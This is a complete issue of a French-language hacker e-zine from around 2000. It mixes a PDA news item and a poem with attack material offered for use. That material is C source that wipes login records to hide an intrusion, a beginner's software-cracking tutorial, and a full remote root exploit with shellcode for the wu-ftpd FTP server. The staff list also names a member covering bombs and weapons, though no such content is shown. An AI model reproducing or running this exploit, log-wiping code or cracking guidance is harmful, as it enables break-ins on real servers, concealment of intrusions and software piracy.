Copy Link
Add to Bookmark
Report

The Belgian Hackers Zone Issue 05

eZine's profile picture
Published in 
The Belgian Hackers Zone
 · 4 years ago

  

**** 55555555555
** ************** 555
**|********* ** ** ************* 55
** *** *** ** 666 * ___ 555
*|* ** *** ** 666 * / ) 55 5555 5 5
*| * ** ** ** ** ! ) 55555 5 5 55 5
*|* * ** ** ** 999999 (___) 55
**|*********** **66666* ** ** 555
$$|* ** **6666** ** ** 55
*|* * ** ** ** ** 55
*|** ** ** ** ** ** 55
*/* ******** *** ** ** 55 555
$$$$$$$ BHZ *** !!!!!!!!!!!!! 55 555
* ----- ****

The Belgian Hackers Zone !!!


BHZ Mag n0 5 !!! Dej le 5eme numero de ce zine. Bon, ce cinquieme numero est l'occasion de vous presenter les nouveaux membres : Deepthroat (teknocide@hotmail.com), Sexywax (mulphex78@hotmail.com) il y a aussi Grim@ qui n'est pas membre mais qui ecrit des articles pour le zine.
Visitez le site du BHZ : http://www.thebhz.org http://www.bhz.be.tf

Si vous lisez ceci c'est que vous avez telecharge ce zine sur madchat. C'est une version censuree, afin de lire la version originale de BHZ Mag n5, rendez vous sur le site du BHZ (http://www.thebhz.org) ou sur un des autres sites qui distribuent BHZ Mag.

Voici la repartition (plus ou moins) des taches au BHZ :
Asmodeus : hacking, phreaking, linux, etc... asmodeus@mail.be
Deepthroat : bombes, pieges, explosifs, armes, etc... teknocide@hotmail.com
Flat Eric : piquer la copine d'Asmodeus..., glander, s'amuser avec son commodore 64,... Flat_eric@moncourrier.com
Greven : glander, un peu de html, un peu de gfx... il change tt le temps d'email...
Sexywax : cracking, programation, gfx,etc... mulphex78@hotmail.com
Grim@ : cracking grima@hotmail.com

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>




1.Linux sur les machines de poche [ by Asmodeus ]
*********************************

2.Comment effacer ses traces des logs ? [ by Asmodeus ]
***************************************

3.Tutorial sur le cracking [ by Grim@ ]
***************************

4.Exploit distance de Wu-ftpd [ by Asmodeus ]
*******************************

5.Le CCU (Computer Crime Unit) [ by Asmodeus ]
******************************

6.Les petites recettes maisons [ by Deepthroat ]
******************************

7.Le virus I LOVE YOU [ by Asmodeus ]
*********************

8.Hack de carmail version 4 [ by Asmodeus ]
***************************

9.S'amuser avec les abonnements Tempo (Mobistar) [ by Asmodeus ]
************************************************

10.S'amuser la maison [ by Asmodeus ]
***********************



*************************************
* 1.Linux sur les machines de poche *
*************************************


L'annee 2OOO serait-elle l'annee LinuX pour les machines de poche ? De plus en plus de constructeurs se tournent vers le pingouin...

Le YOPI
-------

Samsung : le constructeur coreen est sur le point de mettre sur le marche un PDA de type "palm ardoise" dont la particularite est de tourner sous Linux : le Yopi.

Y'a dej pas mal d'applications prevues pour cette machine qui tourne sous ARM Linux : lecteur MP3, jeux, email, navigateur, etc...
Le YOPI a un ecran de 4 pouces pour une resolution de 240x320 en 65536 couleurs. le processeur est cadence 206 Mhz ce qui permet d'avoir des programmes assez interessants.
Le YOPI permet de regarder des films et de surfer sur internet en couleurs et avec du son stereo.
Il a un port CompactFlash qui est le standard le plus repandu sur les machines de poche.
Il peut transmettre des informations via le port infrarouge (IrDA) 4 Mbps. Il permet l'enregistrement de messages avec son micro integre. Le dock du YOPI peut se connecter via le port USB au PC. Il utilise la reconnaissance d'ecriture et le stylet pour naviguer dans l'OS et les differentes applications. Il dispose aussi d'un mode alarme/vibreur.
L'ecran est un ecran TFT cristaux liquides. Il dispose de 32 Mo de RAM et de 32 ou 64 Mo de memoire Flash. Il permet la synchronisation via le PC ou via internet. Il peut d'ailleurs se connecter sur internet avec un telephone mobile ou un modem normal.
Il existe aussi en option une camera et un tuner pour regarder la TV. Il pese 225 grammes et ses dimensions en cm sont de 12.88 (hauteur) x 8.35 (largeur) x 1.99 (profondeur).
Le YOPI permet donc de surfer sur internet, regarder la TV, prendre des photos (camera), regarder les photos prises avec un appareil digital (port CompactFlash type II).
On peut le synchroniser soit via le port USB ou le port serie soit via Internet. Il utilise des batteries Li-on 1400mAh. Le YOPI permet la mise niveau de l'OS facilement et gratuitement (puisque base sur Linux). Le YOPI devrait sortir vers la fin du premier semestre 2000 aux Etats-Unis mais il n'y a pas encore de dates annoncees pour l'Europe...

Linux la place de Windows CE ??
---------------------------------

On connaissait dej les projets visants porter Linux sur des machines fonctionnant sous PalmOS (Palm) ou EPOC (Psion). Un projet plus original de porgtage de Linux sur les machines utilsant windoze CE est en cours. Les palmtops cibles sont entre autre les casio cassiopeia E-105, Compaq Aero, Philips Nino, Everex Freestyle et toutes les machines equipees de processeur StrongArm. Les efforts des devellopeurs se sont concentres au depart sur la sequence de demarrage qui charge le noyau de Linux. Il leur faut maintenant aborder des developpements complementaires telle la "nanogui", interface utilisateur adaptee au ecrans des PalmTops, derivee de XWindows. Les machines clavier sont celles ou une interface de saisie reste la plus simple mettre en oeuvre. Les PDA pilotes par reconnaissance de l'ecriture necessitent un travail beaucoup plus complexe, puisqu'il faut tout simplement developper une nouvelle methode de saisie des donnees.

Les projet Microwindows et Nano-GUI
-----------------------------------

Microwindows est un projet Open Source visant porter les specificites d'une interface graphique et d'un systeme moderne sur des machines de poche. Microwindows permet aux applications d'etre crees et testes sur un systeme Linux et la source doit etre recompilee en partie pour le portage sur la machine de poche. microwindows a ete cree en meme temps que le projet Nano-GUI. L'implemantation de l'API Win32/WinCE se fait avec Microwindows et l'implemantation de l'API Xlib se fait avec Nano-X. La derniere version (la 0.88pre6) supporte GDK/GTK+, opera, Kaffe et FLTK (fast Light Tool Kit (C++) ). Il supporte aussi les polices TrueType et Adobe T1. grace aux drivers mis la disposition des developpeurs, une machine avec un ecran de 3 x 5 pouces LCD peut avoir une resolution de 640 x 480. Microwindows comporte aussi l'alphablending (comme Win 2000 et Mac OS X) personnellement je trouve que ca ne sert rien mais les developpeurs avaient envie de le mettre parce qu'ils trouvaient ca joli... Comme c'est encore en cours de developpement, il n'y a que peu de programmes (lecteurs de ficheirs JPG et BMP, demineur, navigateur web (Opera), etc...) La console est identique celle de n'importe quel systeme Linux.
Pour plus d'infos : http://www.microwindows.censoft.com


Le projet DinX
--------------

DinX est une interface graphique experimentale, concu pour etre simple, leger et rapide, de facon ce qu'il puisse etre porte sur des petits sytemes, comme des machines de poche. DinX est soumis la Mozilla Public License avec une option pour le convertir en GPL. C'est parce que le kernel de DinX peut eventuellement etre base sur une distribution Linux et donc les librairies de DinX pourraient etre en rapport avec d'autres produits GPL. DinX utilise le driver frame buffer video du kernel de Linux et y ajoute /dev/dinxsvr et /dev/dinxwin. Un programme peut se connecter /dev/dinxwin et changer la place d'une fenetre sur l'ecran. Il envoie aussi des evenements comme les mouvements de la souris.



*******************************************
* 2.Comment effacer ses traces des logs ? *
*******************************************


<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Si vous avez eu acces un ordi et que vous avez fait des changements, voici commet effacer les traces...
Il faut editer les fichier /etc/utmp, /user/adm/wtmp et /user/adm/lastlog mais vous ne pouvez pas les
editer avec un editeur normal comme VI il faut un programme special comme celui-ci :

<---couper ici--->


#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}


<---couper ici--->


***************************************
* 3.Tutorial sur le cracking by Grim@ *
***************************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Poetry Scene

Ils sont la, parmi nous...
ils nous observent et ils nous jugent...
Mais vous aussi vous jugez et condamnez
Vous considrez ces gens comme des rebus
des branches a laguer, des exclus...
Jours aprs jours, vous les damnez
annes aprs annes, vous les combattez
mais sans cesse renaissant, toujours battant,
ils rapparaissent, chevalier ardent !

Ils sont la, parmi nous...
ils nous observent et ils nous jugent...
Vous croyez les voir, les connatre,
votre esprit les guette et les pntre
mais jamais, au grand jamais
vous ne pourrez les reconnatre...
Car ils se cachent, et prosprent
en chacun de nous, au fond de l'tre
ado passionn, tudiant branch,
ingnieur fortun, quelqu'un avec des ides
Toujours prts, en latence
Cette petite graine prte germer....

Ils sont la, parmi nous...
ils nous observent et ils nous jugent...
Vous les voyez, sales et dgouttants,
cams et dangereux,
Mais tournez vous et regardez...
Le reste de notre socit, est-il diffrent ?
les chmeurs, les sans-papiers,
les pdg et les gros bonnets
l'extrme droite et les beauf,
les racs et les nons mauve !

Ils sont la, parmi nous...
ils nous observent et ils nous jugent...
On prononce leurs noms et vous crachez,
mais tous au fond, vous les jalousez
secrtement, ils vous passionnent,
secrtement, ils sont idoles...
Pauvre est le Lamer,
pauvre et dseuvr,
criant haut et fort qu'il en est...

Ils sont la, parmi nous...
ils nous observent et ils nous jugent...
Je ne suis qu'un NewBie,
apprenant, patiemment les ficelles du mtier
mais de mes sentiments je ne me cache pas,
je renie la socit, l'autorit
l'lite est mon Dieu,
l'information et le savoir ma nourriture
L'ungerground est le garde-fous de la socit,
le reste n'est que pourriture
Je puis plus vous expliquer,
J'ai choisi, c'est la ma destine....

GrIm@ l'Apprenti s0rcier

-------------------------------------------------
- Underground Production
-
- LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN
---------------------------------------------
<------------------------------TAILLE IDEALE,800x6000--------------------------------------->



0000011110001111100010001001000010001000100000000101100001100100100111001000100001000010000111111000010000100001110000100011000011110000000

CRACKING_BEGINNER n01 by GRIm@, L'Apprenti Sorcier


INTRO:


Salut tous, moi c'est GRIm@, et aujourd'hui on vas parler un peux de
cracking, ... Ce cour est le premier d'un longue srie, qui je l'espre vous sera utile.
Si j'ai dcid d'crire ces tuts, ce n'est non pas par manque de tuts accesible pour les
newbies, mais plutot parceque je trouvais que beaucoup d'entre-eux tais, si non pas
clair, assez court et trop succint. Je vais donc ici tenter de commencer par le dbut, mais
d'abborder beaucoup d'exemple et de situation complte, puis, peux peux, augmenter le niveau.
Je ne suis pas spcialement un 3l33t3, donc il est certain que des erreurs ou des
imprcision ont pus se glisser dans les tuts. Si vous avez des commentaires, n'hsiter pas m'en
faire part grima@hotmail.com (insultes, remerciements, rflexion, demande,...). Si vous
tes dj un Cracker inutile de lire les premiers tuts, il seront vraiment trop simple pour vous,
et si vous tes une 3l33t3 alors passez carmment votre chemin ;-). Bon voil, bref on y vas !

0) Le cracking, c'est koi ?:


Bon, je vais essayer de vous donner tout d'abord un sorte de dfinition personelle du cracking (personelle, donc subjective). Le Cracking, c'est tout d'abord une branche trs active de la scene underground (francophone et autres), c'est cette branche qui permet tout un chaqu'un d'utiliser des programmes non-achet (CD-Grabbs, et Crack). Mais le Cracking, ce n'est vraiment pas que ca, le Cracking, c'est aussi et surtout une sorte de jeux de programmation entre le programmeur et le cracker. Le Cracking pourrait tre rsum par "L'Art de dtourner un programme de son fonctionnement normal", bien que cette dfinition englobe aussi le Reverse-Engineering qui lui est le rajout de fonction non-prvue un programme. Le Cracker
prend souvent un malin plaisir russir battre le programmeur sur son terrain, en modifiant le
plus souvent les programmes demos et sharewares de sorte qu'ils fonctionnent de faon
optimale. Un bon cracker est (je pense) surement programmeur dans l'me, mais cette activite est
ouverte tous, connaisseurs comme non-initi. Finalement, le Cracking apporte aussi une
connaissance aprofondie de la manire dont fonctionne un ordinateur et les programmes qui tourne
dessus (OS et Prog). Pour conclure, je citerais un certain TaMaMBolo (une 3l33t3 qui sort DrapeauNOIr):
"Linux WiNNer, Bye Bye Cracker"... ;-)

1) Le cracking comment ca marche ? Premire basse:


Bon, tout d'abord, il faut que je vous dise que le cracking, c'est comme en
Hack ou en Phreak, y'a pas de solutions miracle ! il faut apprendre des trucs, les retenir et
les appliquer, mais chaqu'un garde sa faon de travailler... Autrefois (y'a pas si longtemps
rassurez-vous), il y avait surtout 2 faon principale pour le cracking, mais aujourd'hui, face
la proffusion des systme de scurit (Multi-Checksum, VBox, RSAgent, Encryption et
Compression), il faut presque absolument utiliser les deux en combinaisons. Ce sera le but des prochains chapitres que de vous apprendre ces diffrentes teknik. Bon, commencons, je suppose que vous avez dj tous essayer d'ouvrir un programme (exe ou com) avec un diteur de texte (style edit ou m$Wordpad...), et qu'avez vous vu ? Ben oui, une srie de caractre illogique et
incomprhensible pour l'tre humain normalement constitu ! Vous vous tes surement dit que le programmes tais fait spcialement, et qu'ils taient crypt ou compress, ou tout autre truc trs spcial. H bien en fait c'est faux, les programmes sont tout fait en clair, mais seulement, il utilise non pas la base 10 (notre systme de compte habituel form de dix chiffres,
0,1,2,3,4,5,6,7,8,9) mais la base 16 aussi apele Hexadcimale (base 10 = dcimal). L'Hexadcimal est un des fondement du cracking, celui qui veut s'y lancer doit absolument le comprendre (c'est pas trs compliqu faut avouer). En fait, l'Hexadcimal n'est pasque rserv au cracking, presque
tous le systme d'un ordinateur PC (je sais pas pour les autres) est bas sur se systme (Bien
sur, pour le processeur tout est transform en Binaire, mais l'Hexadcimal reprsente une
bonne alternative pour la comprhension entre humain et ordi.). Nous reviendrons
l'HexaDcimal plus tard, et plus en dtails. Une autre composantes indispensable et qui vas de pair avec l'Hexa et l'Assembleur, le sacro-saint language qui effraie tellement les newbies. En
fait, l'Assembleur est le language dans lequel sont transforms tous les programmes aprs leur
criture dans d'autre language (C/C++, Delphi, Visual Basic,...). Pour m'exprimmer plus
clairement, quand vous crivez par exemple un programme en C++, ensuite vous le compilez, et l, le compilateur se charge de "traduire" votre programme en Asm (Asm = Assembleur, et Hexa =
Hexadcimal, notez qu'un nombre hexadcimal se note aussi par exemple pour 9: 9h). Comme tous
language, l'Asm est compos d'instructions (nous y reviendrons aussi) qui sont crite
directement en Hexadcimal. Bien sr, il existe une "traduction" en language comprhensible pour
l'homme. L'Assembleur est directement interprt par le processeur, il lui suffit donc de traduire des nombres en Hexadcimal en Binaire et l'inverse. Tout le boulot d'un cracker sera
justement d'aller modifier ces instructions assembleur pour que le programme fonctionne comme on
l'entend. Pour ce faire, et comme je le disais tantot, il existe de nombreux outils et de nobreuses techniques sur lesquelles nous reviendront en dtails, promis !

2) Le Cracking m'apprend des choses sur mon ordi !


2.1) L'Hexadecimal


Bon, nous allons revenir un peux plus en dtails sur ce fameux systme de
comptage qu'est l'Hexadecimal, vous aller le voir c'est pas compliqu. L'Hexa est donc un
systme pour compter comprenant 16 chiffre (au lieu de 10 dans notre systme dcimal), ceux-ci
sont: 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Vous voyez donc que l'on a introduis des lettres dans le
systme pour avoir nos 16 chiffres. En gros, A=10, B=11,... et F=15, c'est donc assez simple et pas trs compliqu (j'me rpete la non ?). Mais attenttion, il faut jamais oubli que par
exemple 10h (10 en Hexa) n'est pas du tout gal 10 en dcimal, en effet, 10h=16. Sinon, je vous
fait confiance, vous deviez tre assez intelligent pour arriver compter non ?

2.2) L'Assembleur


Bon, on vas attaquer maintenant un autre chapitre disons un peu plus
compliqu, mais pas d'inquitude, pas tellement... Mais avant de commencer, je voudrais vous
dire qu'ici je n'expliquerais que quelque base d'Assembleur (ou ce qui nous est ncessaire
dans notre lutte), pour trouver de vrai cour d'Assembleur, chercher sur le net (Je vous
reccomande l'excellent tut de Falcon sur le sujet dans "La Bible du Cracker", 187Ko). Bon, on vas
comemncer, non ?!
Comme tout language de programmation, l'ASM est compos d'instruction qui
permettent d'effectuer des actions, mais comme ce language est trs prs du systme, il est
possible d'utiliser de nombreuse fonction de celui-ci. Mais Voyons tout d'abord quelque
instrucions:
-mov
-jmp
-jne/je/j*
-cmp
-test
-sub/add
-call & ret
Bon, regardons les dans l'ordre, mov permet de dplacer une valeur, ou
plutot d'assigner une mmoire une valeur quelconque. Ex: mov eax, 00000012. Ici je place dans eax (on verra aprs ce que c'est, disons pour l'instant que c'est une sorte de variable) une
valeur, ici 12h. Vous avez surement remarqu qu'on la disposition spciale: "mov variable, valeur", il est donc tout fait interdit de faire ceci: "mov 00000012, eax", puisqu'ici on assigne comme variable une valeur fixe (pour mieux dire, on ne peut affecter la valeur de eax 12h puisqu'il ne s'agit pas d'une zone de la mmoire (une variable) mais une valeur fixe). Ensuite, jmp, quant elle sert faire un "jump", c'est dire sauter. En effet, l'Asm (=assembleur) est excut ligne par ligne (programmation linaire != programmation vnementielle ou programmation objet), et donc si l'on veut passer une autre ligne que la suivante, il faut absolument en sauter certaine, d'ou le nom de "jump". Ex: "jmp 00405689". Ici, le programme vas sauter la ligne 00405689 et ce quelque soit l'endroit ou on est. Les diffrent saut logique (c'est leur nom) tel que "je", "jne",... permettent quant eux de sauter une ligne uniquement si une condition est remplie. Ex: "jne 00405689". Jne signifie Jump if Not Equal, et Je Jump if Equal... Les deux instructions suivantes, test et cmp permettent quant elle de justement spcifier une condition. Ex:
-test eax, eax /* eax = 0 ?
je 00405689 /* si oui saute, si non saute pas
-cmp eax, 00000000 /* eax = 0 ?
jne 0045689 /* saute si eax != 0
Avouez que c'est pas trs compliqu quand mme non ? Les deux instruciotn
suivantes, sub et add
sont des opration mathmatique; sub est une soustraction et add une
addition.
Ex: -sub eax, 00000008 /* retire 8 eax, ou eax = eax - 8
-add eax, 00000007 /* ajoute 7 eax, ou eax = eax + 7
Maintenant, l'instruction call, celle-ci permet comme un jmp d'aller sur des
lignes de code spcifies, mais en plus, de pouvoir revenir sur la ligne suivant le call en
utilsant la comande ret. Ex: call 00405689. Bref, cette instruction permet votre programme de
faire des sortes de fonction...
Bon, avec tout ca, vous pouvez dj nous composer un joli petit prog non ?
On va essayer:

...
call 00405689
sub eax, 0000002
cmp eax, 0000001
je 00405874
jmp 00405872
...

En gros ici, on apelle une fonction qui vas mettre une valeur dans eax, puis
on enlve 2 eax, ensuite on regarde si eax = 1 et si c'est le cas on saute plus loin, par
contre si ca n'est pas le cas, le jmp nous permettra d'aller 2 lignes juste avant celle ou nous
aurions dus arriver si eax avait galer 3 la sortie de la fonction (vous me suivez toujours
?Soyez sur de comprendre, c'est vraiment la base base base...).
Bon aller, on vas arreter l'Assembleur pour le moment, mais soyez sur de
bien comprendre, le reste on le verra au fur et mesure qu'on avancera.

3) De quoi j'ai Besoin ?


-D'un cervau: Trs important ici, puisque le but c'est d'tre plus intelligent que le prgrammeur.
-De Temps: H oui, cracker ca prend parfois du temps (surtout au dbut) alors si vous avez des devoirs, faite-les en priorits.... ;-)
-D'une conscience: heu... la je suis pas sr !!
-D'un Ordi (la bonne blague) de prfrence avec Windob... (LiNuX WiNnEr)
-De programmes: Veille-toi te munir des pas mal de prog, ca sert toujours...
Parmis les indispensables: WDasm 8.93, SoftIce (je crois que c'est la version 5), HView, calculette et convertisseur Hexa.
Les Utiles: FileMon et RegMon, Un dcompilateur VB (Dodi's
vb discompiler), ProcDump, PeSniffer 1.6, Frog's Ice, Une doc complte sur
les API de Windobe, un PatchMaker pour distribuer ses propre Crack, Plein de Doc
sur l'Asm et la coresspondance Hexa, ...
Les "J'men sert Parfois": Un dcompilateur Java (JAB) et
Delphi (EXE2DPR), un diteur de resource (Borland Ressource WorkShop,
Restorator,...), un Comparateur de Fichier, Diffrent prog ayant une utilit trs cible
(dcompresseur, dcrypteur, ...) ...
Vous pouvez tout trouver sur le net, cherchez sur les sites
de cracking, ou http://astalavista.box.sk
-De Cible: Ca y'a pas de problme, le net ou les CD regorge de programmes Shareware....
Je Crois que c'est peux prs tout, mais il se peut que ma mmoire dfaille... ;-)


#) Out


Bon allez, je Crois que ca doit suffire pour Aujourd'hui non ? Mais ne vous
inquitez pas, le n2 vas surement bientot sortir aussi (dj au sommaire: WDAsm, une liste
d'instruction, etc...). Sinon, rien que pour vous je vous file une liste de site parlant de Cracking avec des groupes francophone assez actif:

http://zone14.cjb.net [Zone 14], C'est mon groupe =-)
(pub, spam ;-)
http://tamambolo.free.fr/" TaMamBoLo (DrapeauNoir)
http://mainrouge.cjb.net/ La Main Rouge
http://www.geocities.com/Paris/6770/IRIP/ IRIP Center of Cracking
http://crackfr.cjb.net/ crackfr.com #CRACK.FR UNDERNET
http://www.citeweb.net/atpteam/ ATP TEAM !!
http://reverserlinks.cjb.net/ Reverser's links
http://astalavista.box.sk/ ASTALAVISTA, LE moteur de
recherche de crack

#EOF CRACKING_BEGINNER n01 06-04-2000


***********************************
* 4.Exploit distance de Wu-ftpd *
***********************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Wu-ftpd remote exploit (pour la version wu-2.4.2-academ[BETA-18](1) )
Pour Linux x86 (Redhat 5.2). Pour exploiter ceci distance, vous devez avoir
un repertoire o vous pouvez ecrire des privileges, c'est l'argument <dir>
vous pouvez aussi utiliser ca localement en specifiant -l <login> <pass> avec
le <dir> = votre repertoire.

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>

#define RET 0xbfffa80f

void logintoftp();
void sh();
void mkd(char *);
int max(int, int);

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";

char tmp[256];
char name[128], pass[128];

int sockfd;

int main(int argc, char **argv)
{
char sendln[1024], recvln[4048], buf1[800], buf2[1000];
char *p, *q;
int len, offset = 0, i;
struct sockaddr_in cli;

if(argc < 3){
printf("usage: %s <host> <dir> [-l name pass] [offset]\n", argv[0]);
exit(0);
}
if(argc >= 4){
if(strcmp(argv[3], "-l") == 0){
strncpy(name, argv[4], 128);
strncpy(pass, argv[5], 128);
} else {
offset = atoi(argv[3]);
}
if(argc == 7)
offset = atoi(argv[6]);
}

if(name[0] == 0 && pass[0] == 0){
strcpy(name, "anonymous");
strcpy(pass, "bill@microsoft.com");
}

bzero(&cli, sizeof(cli));
bzero(recvln, sizeof(recvln));
bzero(sendln, sizeof(sendln));
cli.sin_family = AF_INET;
cli.sin_port = htons(21);
inet_pton(AF_INET, argv[1], &cli.sin_addr);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(0);
}
while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
recvln[len] = '\0';
if(strchr(recvln, '\n') != NULL)
break;
}
logintoftp(sockfd);
printf("logged in.\n");
bzero(sendln, sizeof(sendln));

for(i=0; i<996; i+=4)
*(long *)&buf2[i] = RET + offset;
memset(buf1, 0x90, 800);
memcpy(buf1, argv[2], strlen(argv[2]));
mkd(argv[2]);
p = &buf1[strlen(argv[2])];
q = &buf1[799];
*q = '\x0';
while(p <= q){
strncpy(tmp, p, 200);
mkd(tmp);
p+=200;
}
mkd(shellcode);
mkd("bin");
mkd("sh");
p = &buf2[0];
q = &buf2[999];
while(p <= q){
strncpy(tmp, p, 250);
mkd(tmp);
p+=250;
}
sh(sockfd);


close(sockfd);
printf("finit.\n");
}

void mkd(char *dir)
{
char snd[512], rcv[1024];
char blah[1024], *p;
int n;

bzero(blah, sizeof(blah));
p = blah;
for(n=0; n<strlen(dir); n++){
if(dir[n] == '\xff'){
*p = '\xff';
p++;
}
*p = dir[n];
p++;
}
sprintf(snd, "MKD %s\r\n", blah);
write(sockfd, snd, strlen(snd));
bzero(snd, sizeof(snd));
sprintf(snd, "CWD %s\r\n", blah);
write(sockfd, snd, strlen(snd));
bzero(rcv, sizeof(rcv));
while((n = read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}

void logintoftp()
{
char snd[1024], rcv[1024];
int n;

printf("logging in with %s: %s\n", name, pass);
memset(snd, '\0', 1024);
sprintf(snd, "USER %s\r\n", name);
write(sockfd, snd, strlen(snd));

while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}

memset(snd, '\0', 1024);
sprintf(snd, "PASS %s\r\n", pass);
write(sockfd, snd, strlen(snd));

while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
rcv[n] = 0;
if(strchr(rcv, '\n') != NULL)
break;
}
return;
}

void sh()
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;

strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(sockfd, snd, strlen(snd));

for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if(FD_ISSET(sockfd, &rset)){
bzero(rcv, sizeof(rcv));
if((n = read(sockfd, rcv, sizeof(rcv))) == 0){
printf("EOF.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(rcv, stdout);
}
}
}

int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}





**********************************
* 5.Le CCU (Computer Crime Unit) *
**********************************


Le CCU est la police informatique de Belgique mais ce ne sont pas des informaticiens qui en font partie,
et non : ce sont des policiers qui se disent auto-didactes (comme bon nombre de hackers...) Et en plus ils sont
pas beaucoup : une dizaine Bruxelles et 3 ou 4 par province... C'est ces ptits rigolos qui ont buste
ReDaTtAcK et ils disent de lui que c'est un script kiddie... Red lui dit que quand la P.J. de Gand s'est amene
chez lui, ils ont allume son ordinateur et comme c'etait Linux qui etait installe,
ils savaient pas s'en servir !! C'est pour ca qu'ils ont fait appel au CCU...
Mais mon avis ils sont trop peu nombreux pour tout le pays... C'est sans doute parce que jusqu' maintenant
il n'y avait que peu de hacking en Belgique... D'apres un de ces mecs, ils sont la recherche d'un groupe de hackers belges
(probablement le groupe hack.be) qui se sont dej fait quelques serveurs de banques et de societes...
Moi, je ne pense pas qu'ils vont les avoir, le CCU c'est juste des policiers deguises en cyberflics mais ils n'ont pas
recus la formation necessaire et ils pensent etre les meilleurs...
Il y a meme un des gars du CCU qui a dit qu'il trouvait que Back Orifice etait impressionant...
C'est vrai que c'est pas mal mais c'est surtout le troyen le plus utilise ou du moins un des plus utilises....
Et si c'est les mecs qui utilisent Back Orifice qu'ils veulent buster alors c clair qu'ils en sont capables...
Je n'ai pas trouve de site web sur cette organisation... pas la peine de hacker www.ccu.be : c'est le site du centre culturel d'Uccle...
Ils disent aussi avoir demantele un reseau de Warez qui faisait des copies de CD ;
il s'agissait en fait d'un ptit groupe de 4 personnes : un qui copiait, deux qui fournissaient et un qui vendait... Le CCU est donc beaucoup moins actifs que d'autres polices informatiques et il fait donc beaucoup moins parler de lui. Mais on ne sait jamais : peut-tre qu'avec de la chance ils arrivreront buster certaines personnes.... mme si pour l'instant, le risque est quasi-nul...



************************************************
* 6.Les petites recettes maisons by Deepthroat *
************************************************

